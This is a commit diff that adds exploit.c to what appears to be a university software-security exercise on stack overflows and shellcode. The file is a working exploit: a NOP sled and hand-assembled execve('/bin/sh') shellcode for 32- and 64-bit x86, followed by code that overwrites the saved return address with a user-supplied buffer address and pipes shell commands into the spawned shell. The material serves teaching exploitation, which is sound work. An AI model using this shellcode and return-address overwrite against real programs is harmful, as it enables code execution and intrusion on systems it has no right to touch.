Add TD5 q3 (first part)

content/secu_logicielle/td5-stackoverflow_shellcode/files/q3/exploit.c

@@ -0,0 +1,62 @@
+#include <stdlib.h>
+#include <stdio.h>
+
+
+unsigned char exploit[1024] = {
+	0x90, 0x90, 0x90, 0x90,		// A few nops for some margin
+	0x90, 0x90, 0x90, 0x90,
+	0x90, 0x90, 0x90, 0x90,
+	0x90, 0x90, 0x90, 0x90,
+
+#ifdef __x86_64__
+	/* 64 bit version */
+	0xe8, 0x08, 0x00, 0x00, 0x00,	// push the address of what is next
+	'/','b','i','n','/','s','h','\0',
+	0x5f,				// pop the address
+	0x48, 0xc7, 0xc0, 0x3b, 0x00, 0x00, 0x00,	// execve system call
+	0x6a, 0x00,			// push NULL at the end of the array
+	0x48, 0x89, 0xe2,		// envp
+	0x57,				// push adress
+	0x48, 0x89, 0xe6,		// argv
+	0x0f, 0x05,			// system call!
+#else
+	/* 32 bit version */
+	0xe8, 0x08, 0x00, 0x00, 0x00,	// push the address of what is next
+	'/','b','i','n','/','s','h','\0',
+	0x5b,				// pop the adress
+	0xb8, 0x0b, 0x00, 0x00, 0x00,	// execve system call
+	0x6a, 0x00,			// push NULL at the end of the array
+	0x89, 0xe2,			// envp
+	0x53,				// push adress
+	0x89, 0xe1,			// argv
+	0xcd, 0x80,			// system call!
+#endif
+};
+
+int main(void) {
+	int i;
+	void **exploit_ptr = (void*) &exploit;
+	void *ptr;
+
+	fprintf(stderr,"Type the buf address printed by anodin\n");
+	scanf("%p", &ptr);
+
+	// Un peu de marge
+	ptr += 8;
+
+	// écraser l'adresse de retour
+	for (i = 0; i < 8; i++)
+		exploit_ptr[64/sizeof(void*)+i] = ptr;
+
+	for (i=0;i<sizeof(exploit);i++)
+		putchar(exploit[i]);
+
+	for (i=0;i<8192;i++)
+		putchar('\n');
+
+	printf("touch /tmp/ahah\n");
+	printf("echo \"I created file\" /tmp/ahah \\!\n");
+	fflush(stdout);
+
+	return 0;
+}